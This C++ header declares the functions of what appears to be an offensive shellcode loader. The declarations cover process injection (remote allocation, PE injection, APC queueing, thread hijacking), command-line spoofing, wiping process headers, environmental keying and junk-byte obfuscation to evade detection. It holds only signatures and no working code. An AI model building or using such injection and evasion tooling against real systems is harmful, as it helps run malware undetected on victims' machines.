#pragma once

#include "commons.h"


/////////////////////////////////////////////////////

bool infectProcess(PROCESS_INFORMATION* pinfo, bool skipEnvChecks = false);

PROCESS_INFORMATION spawnChildProcess(
    const std::wstring& command,
    HANDLE stdoutHandle = INVALID_HANDLE_VALUE
);

bool postExecute(HANDLE hProcess);

void wipeProcessHeaders(HANDLE process);

void* allocateRemote(
    PROCESS_INFORMATION *pinfo,
    AllocationTechnique technique,
    size_t size,
    DWORD protection,
    HANDLE* alertableThread = NULL
);

bool
mapViewOfSection(
    HANDLE processHandle,
    HANDLE sectionHandle,
    uint8_t *buf,
    size_t size,
    DWORD protection,
    uint8_t** ptrToAlloc
);

bool processArgumentSpoofing(
    const HANDLE hProcess, 
    const std::wstring& imagePath, 
    wchar_t* fakeCommandLine
);

void peInject(
    uint8_t* buf,
    size_t bufsize,
    PEInjectTechnique technique,
    PROCESS_INFORMATION *pinfo
);

bool executeRemotely(
    PROCESS_INFORMATION *pinfo,
    void* alloc,
    ExecutionTechnique execTech,
    AllocationTechnique allocTech = useLocal,
    WriteTechnique writeTech = useNtWriteVirtualMemory
);

std::vector<std::tuple<uintptr_t, size_t, std::vector<uint8_t>>> fragmentShellcode(
    size_t bytes, 
    void* address, 
    void* data
);

bool launchHelper(
    AllocationTechnique allocTech,
    WriteTechnique writeTech,
    ExecutionTechnique execTech,
    uint8_t *_buf,
    size_t bufsize,
    PROCESS_INFORMATION* pinfo
);

bool launch(
    void* _buf, 
    size_t bufsize,
    PROCESS_INFORMATION* pinfo = nullptr
);

void* readProcMemory(
    HANDLE process,
    void *address,
    DWORD bytes
);

BOOL writeProcMemory(
    HANDLE process, 
    void *address, 
    void *data, 
    size_t bytes
);

void overwriteMessageProcedureHandler(
    PROCESS_INFORMATION *pinfo,
    AllocationTechnique allocTech,
    WriteTechnique writeTech,
    void *address
);

void createRemoteThread(
    HANDLE process, 
    void* address, 
    bool suspended = false
);

void rtlCreateUserThread(
    void* address,
    HANDLE remoteProcess
);

void queueApcThread(
    void* address,
    HANDLE remoteThread,
    PVOID arg1 = NULL, 
    PVOID arg2 = NULL,
    PVOID arg3 = NULL,
    bool suspendThread = true,
    bool dontCloseHandle = false
);

void queueApcThread1(
    void* address,
    HANDLE remoteThread,
    PVOID arg1,
    bool suspendThread = true,
    bool dontCloseHandle = false
);

void setContextThread(
    void* address,
    DWORD remoteThread,
    HANDLE *pThread = NULL,
    bool alreadySuspended = false,
    bool dontCloseHandle = false
);

void createThread(
    void* address, 
    bool suspended
);

DWORD WINAPI threadProc(
    void* lpParameter
);

bool preExecute();

void jumpToShellcode(
    void* address
);

bool checkIfSafeToLaunch();

void* queueApcHeapCreate(
    PROCESS_INFORMATION* pinfo,
    size_t bufsize,
    DWORD protection,
    HANDLE *alertableThread = NULL
);

LONG WINAPI PoloniumUnhandledExceptionFilter(
    _In_ struct _EXCEPTION_POINTERS *ExceptionInfo
);

bool processEnvironmetalKeying();

void permutateJunkBytesPrependingShellcode(LPBYTE buffer = nullptr);